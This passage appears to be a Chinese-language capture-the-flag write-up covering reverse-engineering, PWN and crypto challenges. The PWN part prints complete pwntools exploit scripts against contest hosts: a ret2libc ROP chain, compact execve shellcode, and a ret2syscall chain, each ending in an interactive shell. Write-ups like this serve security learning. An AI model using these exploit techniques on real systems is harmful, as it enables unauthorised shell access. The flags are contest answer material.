i11i1Iii1I1[15 ] + -9 * i11i1Iii1I1[16 ] + 90 * i11i1Iii1I1[17 ] + -2 * i11i1Iii1I1[18 ] + 609 * i11i1Iii1I1[19 ] + 0 * i11i1Iii1I1[20 ] + 21 * i11i1Iii1I1[21 ] + 2 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 24 * i11i1Iii1I1[24 ]) + 25 * i11i1Iii1I1[25 ] - 26 * i11i1Iii1I1[26 ]) + 27 * i11i1Iii1I1[27 ] == 777044 , (((((177 * i11i1Iii1I1[0 ] - 22 * i11i1Iii1I1[1 ]) + 699 * i11i1Iii1I1[2 ] + 64 * i11i1Iii1I1[3 ] - 56 * i11i1Iii1I1[4 ] - 96 * i11i1Iii1I1[5 ] - 66 * i11i1Iii1I1[6 ]) + 96 * i11i1Iii1I1[7 ] - 60 * i11i1Iii1I1[8 ] - 20 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 3 * i11i1Iii1I1[11 ] + 10 * i11i1Iii1I1[12 ] + 707 * i11i1Iii1I1[13 ] + 250 * i11i1Iii1I1[14 ] + 666 * i11i1Iii1I1[15 ] + -9 * i11i1Iii1I1[16 ] + 0 * i11i1Iii1I1[17 ] + -2 * i11i1Iii1I1[18 ] + 69 * i11i1Iii1I1[19 ] + 0 * i11i1Iii1I1[20 ] + 21 * i11i1Iii1I1[21 ] + 222 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 224 * i11i1Iii1I1[24 ]) + 25 * i11i1Iii1I1[25 ] - 26 * i11i1Iii1I1[26 ]) + 27 * i11i1Iii1I1[27 ] - 28 * i11i1Iii1I1[28 ] == 185016 , ((((((77 * i11i1Iii1I1[0 ] - 2 * i11i1Iii1I1[1 ]) + 6 * i11i1Iii1I1[2 ] + 6 * i11i1Iii1I1[3 ] - 96 * i11i1Iii1I1[4 ] - 9 * i11i1Iii1I1[5 ] - 6 * i11i1Iii1I1[6 ]) + 96 * i11i1Iii1I1[7 ] - 0 * i11i1Iii1I1[8 ] - 20 * i11i1Iii1I1[9 ]) + 99 * i11i1Iii1I1[10 ] + 3 * i11i1Iii1I1[11 ] + 10 * i11i1Iii1I1[12 ] + 707 * i11i1Iii1I1[13 ] + 250 * i11i1Iii1I1[14 ] + 666 * i11i1Iii1I1[15 ] + -9 * i11i1Iii1I1[16 ] + 0 * i11i1Iii1I1[17 ] + -2 * i11i1Iii1I1[18 ] + 9 * i11i1Iii1I1[19 ] + 0 * i11i1Iii1I1[20 ] + 21 * i11i1Iii1I1[21 ] + 222 * i11i1Iii1I1[22 ] + 23 * i11i1Iii1I1[23 ] - 224 * i11i1Iii1I1[24 ]) + 26 * i11i1Iii1I1[25 ] - -58 * i11i1Iii1I1[26 ]) + 27 * i11i1Iii1I1[27 ] - 2 * i11i1Iii1I1[28 ]) + 29 * i11i1Iii1I1[29 ] == 130106 ] if all (ii1iIi1i11i): print ('Congratulation!!!' ) else : print ('wrong_wrong!!!' )
然后ai脚本一把梭
i11i1Iii1I1 = [0 ] * 30 frequencies = [1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 6 , 2 , 5 , 7 , 4 , 3 , 1 ] for k in range (15 ): i11i1Iii1I1[2 * k + 1 ] = ord (str (frequencies[k])) equations = [ lambda v: 7 * v[0 ], lambda v: 9 * v[0 ] - 5 * v[1 ], lambda v: (2 * v[0 ] - 5 * v[1 ]) + 10 * v[2 ], lambda v: 3 * v[0 ] + 8 * v[1 ] + 15 * v[2 ] + 20 * v[3 ], lambda v: (5 * v[0 ] + 15 * v[1 ] + 20 * v[2 ] - 19 * v[3 ]) + 1 * v[4 ], lambda v: (7 * v[0 ] + 1 * v[1 ] + 9 * v[2 ] - 11 * v[3 ]) + 2 * v[4 ] + 5 * v[5 ], lambda v: 11 * v[0 ] + 22 * v[1 ] + 33 * v[2 ] + 44 * v[3 ] + 55 * v[4 ] + 66 * v[5 ] - 77 * v[6 ], lambda v: ((21 * v[0 ] + 23 * v[1 ] + 3 * v[2 ] + 24 * v[3 ] - 55 * v[4 ]) + 6 * v[5 ] - 7 * v[6 ]) + 15 * v[7 ], lambda v: (2 * v[0 ] + 26 * v[1 ] + 13 * v[2 ] + 0 * v[3 ] - 65 * v[4 ]) + 15 * v[5 ] + 29 * v[6 ] + 1 * v[7 ] + 20 * v[8 ], lambda v: (10 * v[0 ] + 7 * v[1 ] - 9 * v[2 ] + 6 * v[3 ] + 7 * v[4 ] + 1 * v[5 ] + 22 * v[6 ] + 21 * v[7 ] - 22 * v[8 ]) + 30 * v[9 ], lambda v: (15 * v[0 ] + 59 * v[1 ] + 56 * v[2 ] + 66 * v[3 ] + 7 * v[4 ] + 1 * v[5 ] - 122 * v[6 ]) + 21 * v[7 ] + 32 * v[8 ] + 3 * v[9 ] - 10 * v[10 ], lambda v: (((13 * v[0 ] + 66 * v[1 ] + 29 * v[2 ] + 39 * v[3 ] - 33 * v[4 ]) + 13 * v[5 ] - 2 * v[6 ]) + 42 * v[7 ] + 62 * v[8 ] + 1 * v[9 ] - 10 * v[10 ]) + 11 * v[11 ], lambda v: (((23 * v[0 ] + 6 * v[1 ] + 29 * v[2 ] + 3 * v[3 ] - 3 * v[4 ]) + 63 * v[5 ] - 25 * v[6 ]) + 2 * v[7 ] + 32 * v[8 ] + 1 * v[9 ] - 10 * v[10 ]) + 11 * v[11 ] - 12 * v[12 ], lambda v: ((((223 * v[0 ] + 6 * v[1 ] - 29 * v[2 ] - 53 * v[3 ] - 3 * v[4 ]) + 3 * v[5 ] - 65 * v[6 ]) + 0 * v[7 ] + 36 * v[8 ] + 1 * v[9 ] - 15 * v[10 ]) + 16 * v[11 ] - 18 * v[12 ]) + 13 * v[13 ], lambda v: ((((29 * v[0 ] + 13 * v[1 ] - 9 * v[2 ] - 93 * v[3 ]) + 33 * v[4 ] + 6 * v[5 ] + 65 * v[6 ] + 1 * v[7 ] - 36 * v[8 ]) + 0 * v[9 ] - 16 * v[10 ]) + 96 * v[11 ] - 68 * v[12 ]) + 33 * v[13 ] - 14 * v[14 ], lambda v: (((69 * v[0 ] + 77 * v[1 ] - 93 * v[2 ] - 12 * v[3 ]) + 0 * v[4 ] + 0 * v[5 ] + 1 * v[6 ] + 16 * v[7 ] + 36 * v[8 ] + 6 * v[9 ] + 19 * v[10 ] + 66 * v[11 ] - 8 * v[12 ]) + 38 * v[13 ] - 16 * v[14 ]) + 15 * v[15 ], lambda v: ((((23 * v[0 ] + 2 * v[1 ] - 3 * v[2 ] - 11 * v[3 ]) + 12 * v[4 ] + 24 * v[5 ] + 1 * v[6 ] + 6 * v[7 ] + 14 * v[8 ] - 0 * v[9 ]) + 1 * v[10 ] + 68 * v[11 ] - 18 * v[12 ]) + 68 * v[13 ] - 26 * v[14 ]) + 15 * v[15 ] - 16 * v[16 ], lambda v: (((((24 * v[0 ] + 0 * v[1 ] - 1 * v[2 ] - 15 * v[3 ]) + 13 * v[4 ] + 4 * v[5 ] + 16 * v[6 ] + 67 * v[7 ] + 146 * v[8 ] - 50 * v[9 ]) + 16 * v[10 ] + 6 * v[11 ] - 1 * v[12 ]) + 69 * v[13 ] - 27 * v[14 ]) + 45 * v[15 ] - 6 * v[16 ]) + 17 * v[17 ], lambda v: ((((25 * v[0 ] + 26 * v[1 ] - 89 * v[2 ]) + 16 * v[3 ] + 19 * v[4 ] + 44 * v[5 ] + 36 * v[6 ] + 66 * v[7 ] - 150 * v[8 ] - 250 * v[9 ]) + 166 * v[10 ] + 126 * v[11 ] - 11 * v[12 ]) + 690 * v[13 ] - 207 * v[14 ]) + 46 * v[15 ] + 6 * v[16 ] + 7 * v[17 ] - 18 * v[18 ], lambda v: (((((5 * v[0 ] + 26 * v[1 ] + 8 * v[2 ] + 160 * v[3 ] + 9 * v[4 ] - 4 * v[5 ]) + 36 * v[6 ] + 6 * v[7 ] - 15 * v[8 ] - 20 * v[9 ]) + 66 * v[10 ] + 16 * v[11 ] - 1 * v[12 ]) + 690 * v[13 ] - 20 * v[14 ]) + 46 * v[15 ] + 6 * v[16 ] + 7 * v[17 ] - 18 * v[18 ]) + 19 * v[19 ], lambda v: ((((((29 * v[0 ] - 26 * v[1 ]) + 0 * v[2 ] + 60 * v[3 ] + 90 * v[4 ] - 4 * v[5 ]) + 6 * v[6 ] + 6 * v[7 ] - 16 * v[8 ] - 21 * v[9 ]) + 69 * v[10 ] + 6 * v[11 ] - 12 * v[12 ]) + 69 * v[13 ] - 20 * v[14 ] - 46 * v[15 ]) + 65 * v[16 ] + 0 * v[17 ] - 1 * v[18 ]) + 39 * v[19 ] - 20 * v[20 ], lambda v: (((((((45 * v[0 ] - 56 * v[1 ]) + 10 * v[2 ] + 650 * v[3 ] - 900 * v[4 ]) + 44 * v[5 ] + 66 * v[6 ] - 6 * v[7 ] - 6 * v[8 ] - 21 * v[9 ]) + 9 * v[10 ] - 6 * v[11 ] - 12 * v[12 ]) + 69 * v[13 ] - 2 * v[14 ] - 406 * v[15 ]) + 651 * v[16 ] + 2 * v[17 ] - 10 * v[18 ]) + 69 * v[19 ] - 0 * v[20 ]) + 21 * v[21 ], lambda v: (((((555 * v[0 ] - 6666 * v[1 ]) + 70 * v[2 ] + 510 * v[3 ] - 90 * v[4 ]) + 499 * v[5 ] + 66 * v[6 ] - 66 * v[7 ] - 610 * v[8 ] - 221 * v[9 ]) + 9 * v[10 ] - 23 * v[11 ] - 102 * v[12 ]) + 6 * v[13 ] + 2050 * v[14 ] - 406 * v[15 ]) + 665 * v[16 ] + 333 * v[17 ] + 100 * v[18 ] + 609 * v[19 ] + 777 * v[20 ] + 201 * v[21 ] - 22 * v[22 ], lambda v: (((((((1 * v[0 ] - 22 * v[1 ]) + 333 * v[2 ] + 4444 * v[3 ] - 5555 * v[4 ]) + 6666 * v[5 ] - 666 * v[6 ]) + 676 * v[7 ] - 660 * v[8 ] - 22 * v[9 ]) + 9 * v[10 ] - 73 * v[11 ] - 107 * v[12 ]) + 6 * v[13 ] + 250 * v[14 ] - 6 * v[15 ]) + 65 * v[16 ] + 39 * v[17 ] + 10 * v[18 ] + 69 * v[19 ] + 777 * v[20 ] + 201 * v[21 ] - 2 * v[22 ]) + 23 * v[23 ], lambda v: (((520 * v[0 ] - 222 * v[1 ]) + 333 * v[2 ] + 4 * v[3 ] - 56655 * v[4 ]) + 6666 * v[5 ] + 666 * v[6 ] + 66 * v[7 ] - 60 * v[8 ] - 220 * v[9 ]) + 99 * v[10 ] + 73 * v[11 ] + 1007 * v[12 ] + 7777 * v[13 ] + 2500 * v[14 ] + 6666 * v[15 ] + 605 * v[16 ] + 390 * v[17 ] + 100 * v[18 ] + 609 * v[19 ] + 99999 * v[20 ] + 210 * v[21 ] + 232 * v[22 ] + 23 * v[23 ] - 24 * v[24 ], lambda v: ((((1323 * v[0 ] - 22 * v[1 ]) + 333 * v[2 ] + 4 * v[3 ] - 55 * v[4 ]) + 666 * v[5 ] + 666 * v[6 ] + 66 * v[7 ] - 660 * v[8 ] - 220 * v[9 ]) + 99 * v[10 ] + 3 * v[11 ] + 100 * v[12 ] + 777 * v[13 ] + 2500 * v[14 ] + 6666 * v[15 ] + 605 * v[16 ] + 390 * v[17 ] + 100 * v[18 ] + 609 * v[19 ] + 9999 * v[20 ] + 210 * v[21 ] + 232 * v[22 ] + 23 * v[23 ] - 24 * v[24 ]) + 25 * v[25 ], lambda v: (((((777 * v[0 ] - 22 * v[1 ]) + 6969 * v[2 ] + 4 * v[3 ] - 55 * v[4 ]) + 666 * v[5 ] - 6 * v[6 ]) + 96 * v[7 ] - 60 * v[8 ] - 220 * v[9 ]) + 99 * v[10 ] + 3 * v[11 ] + 100 * v[12 ] + 777 * v[13 ] + 250 * v[14 ] + 666 * v[15 ] + 65 * v[16 ] + 90 * v[17 ] + 100 * v[18 ] + 609 * v[19 ] + 999 * v[20 ] + 21 * v[21 ] + 232 * v[22 ] + 23 * v[23 ] - 24 * v[24 ]) + 25 * v[25 ] - 26 * v[26 ], lambda v: ((((((97 * v[0 ] - 22 * v[1 ]) + 6969 * v[2 ] + 4 * v[3 ] - 56 * v[4 ]) + 96 * v[5 ] - 6 * v[6 ]) + 96 * v[7 ] - 60 * v[8 ] - 20 * v[9 ]) + 99 * v[10 ] + 3 * v[11 ] + 10 * v[12 ] + 707 * v[13 ] + 250 * v[14 ] + 666 * v[15 ] + -9 * v[16 ] + 90 * v[17 ] + -2 * v[18 ] + 609 * v[19 ] + 0 * v[20 ] + 21 * v[21 ] + 2 * v[22 ] + 23 * v[23 ] - 24 * v[24 ]) + 25 * v[25 ] - 26 * v[26 ]) + 27 * v[27 ], lambda v: (((((177 * v[0 ] - 22 * v[1 ]) + 699 * v[2 ] + 64 * v[3 ] - 56 * v[4 ] - 96 * v[5 ] - 66 * v[6 ]) + 96 * v[7 ] - 60 * v[8 ] - 20 * v[9 ]) + 99 * v[10 ] + 3 * v[11 ] + 10 * v[12 ] + 707 * v[13 ] + 250 * v[14 ] + 666 * v[15 ] + -9 * v[16 ] + 0 * v[17 ] + -2 * v[18 ] + 69 * v[19 ] + 0 * v[20 ] + 21 * v[21 ] + 222 * v[22 ] + 23 * v[23 ] - 224 * v[24 ]) + 25 * v[25 ] - 26 * v[26 ]) + 27 * v[27 ] - 28 * v[28 ], lambda v: ((((((77 * v[0 ] - 2 * v[1 ]) + 6 * v[2 ] + 6 * v[3 ] - 96 * v[4 ] - 9 * v[5 ] - 6 * v[6 ]) + 96 * v[7 ] - 0 * v[8 ] - 20 * v[9 ]) + 99 * v[10 ] + 3 * v[11 ] + 10 * v[12 ] + 707 * v[13 ] + 250 * v[14 ] + 666 * v[15 ] + -9 * v[16 ] + 0 * v[17 ] + -2 * v[18 ] + 9 * v[19 ] + 0 * v[20 ] + 21 * v[21 ] + 222 * v[22 ] + 23 * v[23 ] - 224 * v[24 ]) + 26 * v[25 ] + 58 * v[26 ]) + 27 * v[27 ] - 2 * v[28 ]) + 29 * v[29 ] ] rhs = [ 504 , 403 , 799 , 2938 , 2042 , 1225 , 7975 , 229 , 2107 , 4037 , 4950 , 12544 , 6585 , 6893 , 1883 , 8257 , 5847 , 18257 , 12591 , 52041 , 20253 , 18768 , 111844 , 159029 , 2762025 , 1551621 , 948348 , 777044 , 185016 , 130106 ] coeffs = [7 , None , 10 , None , 1 , None , -77 , None , 20 , None , -10 , None , -12 , None , -14 , None , -16 , None , -18 , None , -20 , None , -22 , None , -24 , None , -26 , None , -28 , None ] for k in range (15 ): eq_idx = 2 * k coeff = coeffs[eq_idx] target = rhs[eq_idx] known_sum = equations[eq_idx](i11i1Iii1I1) - coeff * i11i1Iii1I1[eq_idx] i11i1Iii1I1[eq_idx] = (target - known_sum) // coeff if (target - known_sum) % coeff != 0 : print (f"Error: Non-integer value at index {eq_idx} " ) exit(1 ) unique_chars = [chr (i11i1Iii1I1[2 * k]) for k in range (15 )] print ("Unique characters:" , '' .join(unique_chars))target = '111111116257645365477364777645752361' flag = ['' ] * 36 first_positions = [0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 13 , 15 , 35 ] for pos, char in zip (first_positions, unique_chars): flag[pos] = char freq_map = {'2' : unique_chars[9 ], '3' : unique_chars[13 ], '4' : unique_chars[12 ], '5' : unique_chars[10 ], '6' : unique_chars[8 ], '7' : unique_chars[11 ]} for i in range (36 ): if not flag[i]: flag[i] = freq_map[target[i]] flag_str = '' .join(flag) print ("Flag:" , flag_str)from collections import CounterO0o00 = '' .join(str (Counter(flag_str)[c]) for c in flag_str) assert O0o00 == '111111116257645365477364777645752361' , "Frequency condition failed" iiIII = '' counter = Counter(flag_str) for c in flag_str: if counter[c] > 0 : iiIII += c + str (counter[c]) counter[c] = 0 i11i1Iii1I1_verify = [ord (c) for c in iiIII] ii1iIi1i11i_verify = [eq(i11i1Iii1I1_verify) == r for eq, r in zip (equations, rhs)] assert all (ii1iIi1i11i_verify), "Equations condition failed" print ("Verification passed!" )
HZNUCTF{ad7fa-76a7-ff6a-fffa-7f7d6a}
水果忍者 先看文件修改日期。估计就是在这些今年早些日期的
丢IDA里面,多看几个函数,看到HZNU
丢ai分析,脚本如下
from Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadimport binasciidef decrypt_aes (encrypted_hex, key, iv ): encrypted_bytes = binascii.unhexlify(encrypted_hex) cipher = AES.new(key.encode('utf-8' ), AES.MODE_CBC, iv.encode('utf-8' )) decrypted_bytes = cipher.decrypt(encrypted_bytes) decrypted_data = unpad(decrypted_bytes, AES.block_size).decode('utf-8' ) return decrypted_data encrypted_hex = "cecadff28e93aa5d6f65128ae33e734d3f47b4b8a050d326c534a732d51b96e2a6a80dca0d5a704a216c2e0c3cc6aaaf" key = "HZNUHZNUHZNUHZNU" iv = "0202005503081501" try : decrypted_data = decrypt_aes(encrypted_hex, key, iv) print ("解密后的数据:" , decrypted_data) except Exception as e: print ("解密失败:" , e)
HZNUCTF{de20-70dd-4e62-b8d0-06e}
PWN 签到 简单的签到题,栈溢出构造rop链泄露libc基地址接着构造system(/bin/sh)
from pwn import *from LibcSearcher import *context(arch = 'amd64' ,os = 'linux' ,log_level = 'debug' ) io=remote('node1.tgctf.woooo.tech' ,32243 ) libc = ELF('./libc.so.6' ) elf=ELF('./pwn' ) main=elf.symbols['main' ] puts_got=elf.got['puts' ] puts_plt=0x401060 pop_rdi_ret=0x401176 ret=0x40101a payload=b'a' *(0x70 +8 )+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main) io.sendline(payload) puts=u64(io.recvuntil(b'\x7f' )[-6 :].ljust(8 ,b'\x00' )) print (hex (puts))libc_base=puts-libc.symbols['puts' ] system=libc_base+libc.symbols['system' ] bin_sh=libc_base+0x1d8678 payload1=b'a' *(0x70 +8 )+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(system) io.sendline(payload1) io.interactive()
shellcode checksec
[*] '/home/pwn/桌面/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled
题目提示够用了仔细看寄存器
main
__int64 __fastcall main (int a1, char **a2, char **a3) { void *buf; setbuf(stdin , 0LL ); setbuf(stdout , 0LL ); setbuf(stderr , 0LL ); puts ("hello hacker" ); puts ("try to show your strength " ); buf = mmap(0LL , 0x1000 uLL, 7 , 34 , -1 , 0LL ); read(0 , buf, 18uLL ); mprotect(buf, 0x1000 uLL, 4 ); sub_11C9(buf); return 0LL ; }
buf位于栈上被改为可读可写可执行,后续buf作为参数被传入rdi中调用sub_11C9函数,汇编如下
.text:00000000000011C9 F3 0F 1E FA endbr64 .text:00000000000011CD 55 push rbp .text:00000000000011CE 48 89 E5 mov rbp, rsp .text:00000000000011D1 41 57 push r15 .text:00000000000011D3 41 56 push r14 .text:00000000000011D5 41 55 push r13 .text:00000000000011D7 41 54 push r12 .text:00000000000011D9 53 push rbx .text:00000000000011DA 48 89 7D D0 mov [rbp+var_30], rdi .text:00000000000011DE 48 8B 7D D0 mov rdi, [rbp+var_30] .text:00000000000011E2 48 31 C0 xor rax, rax .text:00000000000011E5 48 31 DB xor rbx, rbx .text:00000000000011E8 48 31 C9 xor rcx, rcx .text:00000000000011EB 48 31 D2 xor rdx, rdx .text:00000000000011EE 48 31 F6 xor rsi, rsi .text:00000000000011F1 4D 31 C0 xor r8, r8 .text:00000000000011F4 4D 31 C9 xor r9, r9 .text:00000000000011F7 4D 31 D2 xor r10, r10 .text:00000000000011FA 4D 31 DB xor r11, r11 .text:00000000000011FD 4D 31 E4 xor r12, r12 .text:0000000000001200 4D 31 ED xor r13, r13 .text:0000000000001203 4D 31 F6 xor r14, r14 .text:0000000000001206 4D 31 FF xor r15, r15 .text:0000000000001209 48 31 ED xor rbp, rbp .text:000000000000120C 48 31 E4 xor rsp, rsp .text:000000000000120F 48 89 FF mov rdi, rdi .text:0000000000001212 FF E7 jmp rdi .text:0000000000001212 .text:0000000000001212 sub_11C9 endp
会将除RDI RIP外的所有寄存器清零故在设置execve(‘/bin/sh,0,0’)时我们不用管rsi和rdx,只用看rdi和rax就好了,关键在于如何让rdi的值为/bin/sh的地址,注意只能是/bin/sh的地址 ,因为execve的各个参数都是指针,如果直接将/bin/sh这个具体字符赋值给rdi函数会无法解析,选择将/bin/sh写在buf上,然后通过rsp传递/bin/sh
lea rsp, [rdi + 11] ;4字节将rdi指向的地址加上 11后的结果赋值给rsp(刚好指向/bin/sh) mov rdi,rsp ;3字节将rsp的值赋给rdi mov al,0x3b ;2字节将rax的值设置为0x3b syscall ;2字节系统调用
exp:
from pwn import *context(arch = 'amd64' ,os = 'linux' ,log_level = 'debug' ) io=remote('node2.tgctf.woooo.tech' ,30243 ) elf=ELF('./pwn' ) shellcode = asm(''' lea rsp, [rdi + 11] mov rdi,rsp mov al,0x3b syscall ''' )payload = shellcode+ b'/bin/sh' io.send(payload) io.interactive()
新姿势:lea用于计算内存地址并将结果存储在目标寄存器中,相较于先add再mov更省字节
stack checksec
桌面$ checksec pwn [*] '/home/pwn/桌面/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
main函数
__int64 __fastcall main (int a1, char **a2, char **a3) setbuf (stdin, 0LL ); setbuf (stdout, 0LL ); setbuf (stderr, 0LL ); std::operator <<<std::char_traits<char >>(&std::cout, "welcome! could you tell me your name?\n" ); read (0 , &unk_404060, 0xA8uLL ); std::operator <<<std::char_traits<char >>(&std::cout, "what dou you want to say?\n" ); sub_4011FA (); return 0LL ; }
sub_4011FA()函数
void *sub_4011FA () signed __int64 v0; char buf[56 ]; void *retaddr; v0 = sys_read (0 , buf, 0x50uLL ); return retaddr; }
sub_4011FA()函数很明显存在栈溢出但是要构造rop链来泄露libc明显不太够main函数中还有个read可以读很多数据到data段
data段从unk_404060开始
.data:0000000000404060 00 unk_404060 db 0 ; DATA XREF: main+62↑o .data:0000000000404061 00 db 0 .data:0000000000404062 00 db 0 .data:0000000000404063 00 db 0 .data:0000000000404064 00 db 0 .data:0000000000404065 00 db 0 .data:0000000000404066 00 db 0 .data:0000000000404067 00 db 0 .data:0000000000404068 00 db 0 .data:0000000000404069 00 db 0 .data:000000000040406A 00 db 0 .data:000000000040406B 00 db 0 .data:000000000040406C 00 db 0 .data:000000000040406D 00 db 0 .data:000000000040406E 00 db 0 .data:000000000040406F 00 db 0 .data:0000000000404070 00 db 0 .data:0000000000404071 00 db 0 .data:0000000000404072 00 db 0 .data:0000000000404073 00 db 0 .data:0000000000404074 00 db 0 .data:0000000000404075 00 db 0 .data:0000000000404076 00 db 0 .data:0000000000404077 00 db 0 .data:0000000000404078 00 db 0 .data:0000000000404079 00 db 0 .data:000000000040407A 00 db 0 .data:000000000040407B 00 db 0 .data:000000000040407C 00 db 0 .data:000000000040407D 00 db 0 .data:000000000040407E 00 db 0 .data:000000000040407F 00 db 0 .data:0000000000404080 00 db 0 .data:0000000000404081 00 db 0 .data:0000000000404082 00 db 0 .data:0000000000404083 00 db 0 .data:0000000000404084 00 db 0 .data:0000000000404085 00 db 0 .data:0000000000404086 00 db 0 .data:0000000000404087 00 db 0 .data:0000000000404088 00 db 0 .data:0000000000404089 00 db 0 .data:000000000040408A 00 db 0 .data:000000000040408B 00 db 0 .data:000000000040408C 00 db 0 .data:000000000040408D 00 db 0 .data:000000000040408E 00 db 0 .data:000000000040408F 00 db 0 .data:0000000000404090 00 db 0 .data:0000000000404091 00 db 0 .data:0000000000404092 00 db 0 .data:0000000000404093 00 db 0 .data:0000000000404094 00 db 0 .data:0000000000404095 00 db 0 .data:0000000000404096 00 db 0 .data:0000000000404097 00 db 0 .data:0000000000404098 00 db 0 .data:0000000000404099 00 db 0 .data:000000000040409A 00 db 0 .data:000000000040409B 00 db 0 .data:000000000040409C 00 db 0 .data:000000000040409D 00 db 0 .data:000000000040409E 00 db 0 .data:000000000040409F 00 db 0 .data:00000000004040A0 01 00 00 00 00 00 00 00 qword_4040A0 dq 1 ; DATA XREF: sub_4011FA-2A↑r .data:00000000004040A8 ; unsigned int fd .data:00000000004040A8 01 00 00 00 00 00 00 00 fd dq 1 ; DATA XREF: sub_4011FA-23↑r .data:00000000004040B0 00 db 0 .data:00000000004040B1 00 db 0 .data:00000000004040B2 00 db 0 .data:00000000004040B3 00 db 0 .data:00000000004040B4 00 db 0 .data:00000000004040B5 00 db 0 .data:00000000004040B6 00 db 0 .data:00000000004040B7 00 db 0 .data:00000000004040B8 ; size_t count .data:00000000004040B8 0B 00 00 00 00 00 00 00 count dq 0Bh ; DATA XREF: sub_4011FA-19↑r .data:00000000004040C0 ; char buf[72] .data:00000000004040C0 00 00 00 00 00 00 00 00 00 00+buf db 48h dup(0) ; DATA XREF: sub_4011FA-3C↑o .data:00000000004040C0 00 00 00 00 00 00 00 00 00 00+ ; sub_4011FA-31↑o .data:0000000000404108 2F 62 69 6E 2F 73 68 00 aBinSh db '/bin/sh',0
发现了/bin/sh地址,先记录后续应该用的上,溢出字节数够我们可以覆盖很多内容:qword_4040A0 dq 1;fd dq 1 ;count dq 0Bh 这三个参数很可疑汇编里找找它在哪
sub_4011FA
发现当[rbp+8]处的内容和[rbp+0x28]处的内容不一样时会跳转到loc_4011B6这个函数
找到这个函数就在sub_4011FA汇编的上面,但是没有对应的函数名称所以在左侧函数名称栏看不到
发现了刚刚我们可以覆盖的那几个参数,分别对应rax ,rdi,rdx,其中通过gdb调试发现rsi的地址是指向0的指针,所以我们可以通过第一个read来覆盖特定参数达到execve(‘/bin/sh,0,0’)
当[rbp+8]处的内容和[rbp+0x28]处的内容不一样时才会跳转到loc_4011B6这个函数,在未栈溢出覆盖时这两个地方的值是一样的所以我们要覆盖掉rbp+8处的内容使函数能正常跳转
完整exp:
from pwn import *context(arch = 'amd64' ,os = 'linux' ,log_level = 'debug' ) io=remote('node1.tgctf.woooo.tech' ,30764 ) elf=ELF('./pwn' ) bin_sh=0x404108 qword_4040A0_offset = 0x40 fd_offset = 0x48 count_offset = 0x58 payload = b'A' * qword_4040A0_offset payload += p64(0x3b ) payload += b'B' * (fd_offset - qword_4040A0_offset - 8 ) payload += p64(0x404108 ) payload += b'C' * (count_offset - fd_offset - 8 ) payload += p64(0x0000000000000000 ) io.send(payload) payload = b'a' *(0x40 )+b'12345678' *2 io.sendafter(b'want to say?\n' ,payload) io.interactive()
overflow checksec
桌面$ checksec pwn [*] '/home/pwn/桌面/pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000)
check版本老了,实际上没开canary因为静态编译所以误检测了,程序是静态编译的,两段输入第一段通过read读到bss段上可以读0x100个字节,第二段gets读入栈上可以栈溢出控制执行流
int __cdecl main (int argc, const char **argv, const char **envp) { char buf[200 ]; int *p_argc; p_argc = &argc; setvbuf(stdin , 0 , 2 , 0 ); setvbuf(stdout , 0 , 2 , 0 ); setvbuf(stderr [0 ], 0 , 2 , 0 ); puts ("could you tell me your name?" ); read(0 , name, 0x100 ); puts ("i heard you love gets,right?" ); gets(buf); return 0 ; }
目前思路在name处写下rop链进行ret2syscall系统调用execve(‘/bin/sh’,0,0),gets处构造溢出控制执行流即可
因为是全静态编译,gets函数也是静态构造的没有link,所以通过gdb调试进入到gets函数来找偏移
前面还有一个 _uflow 函数调用获取一个字符所以我们的输入起始地址是0xfffd048继续调式
可以看到运行到gets函数结束时旧的ebp在0xffffd118处距离输入即为0xD0这个数据和IDA上的相同但是想要控制执行流并不能将返回地址覆盖在0xD0+4+4处因为main函数汇编ret这里有点不一样
我们先找esp因为最后retn是pop eip将esp指向的地址弹给执行流,来到080498C0处也就是lea esp,[ebp - 8]ebp是我们可控的,esp现在的地址是[ebp - 8]处紧接着pop ecx将该处前4个字节弹给ecx后面还要弹两个但是用处不大,就到了0x080498C6处lea esp,[ecx - 4]此时esp的值被改为了[ecx - 4]也就是[ebp - 8 -4]处所以我们要将返回地址放到[ebp-8]处才能跳转且返回地址的值要加4才是正确的返回地址
完整exp
from pwn import *context(arch = 'i386' ,os = 'linux' ,log_level = 'debug' ) io = remote('node1.tgctf.woooo.tech' ,31579 ) elf = ELF('./pwn' ) name=0x080EF320 int_80=0x08073D70 pop_eax=0x080b470a pop_ebx=0x08049022 pop_ecx=0x08049802 pop_edx=0x08060bd1 bin_sh=name payload = b'/bin/sh\x00' +p32(pop_eax)+p32(0xb )+p32(pop_ebx)+p32(bin_sh)+p32(pop_ecx)+p32(0 )+p32(pop_edx)+p32(0 )+p32(int_80) io.sendlineafter(b'your name?\n' ,payload) payload = b'a' *(0xD0 -0x8 )+p32(name+0x4 +0x8 ) io.sendlineafter(b'right?\n' ,payload) io.interactive()
p32(name+0x4+0x8)加4上面已经讲了,加8是为了跳过/bin/sh\x00‘占8字节
Crypto AAAAAAAA·真·签到 从题目的提示可知,原本的flag是以TGCTF为前缀,但是现在的是UGBRC,看字母的规律是,U的前一个字母是T,记为-1,G没变,记为0,B的下一位是C,记为+1,以此类推,数字和符号不变,就可以得到flag:TGCTF{WO0O!Y04_5R3_GOOD_AT_MOVE}
费克特尔 首先分解n
然后脚本
还要将得到的转换为utf-8
转换后的 UTF-8 字符串为: TGCTF{f4888_6abdc_9c2bd_9036bb}
mm不躲猫猫
tRwSiAns
宝宝RSA 由于我们不知道e1,所以需要先求得e1,得到e1就可以得到第一部分的flag
然后求第二部分,用低指数攻击
最后得到完整flag:TGCTF{!!3xP_Is_Sm@ll_But_D@ng3r0}
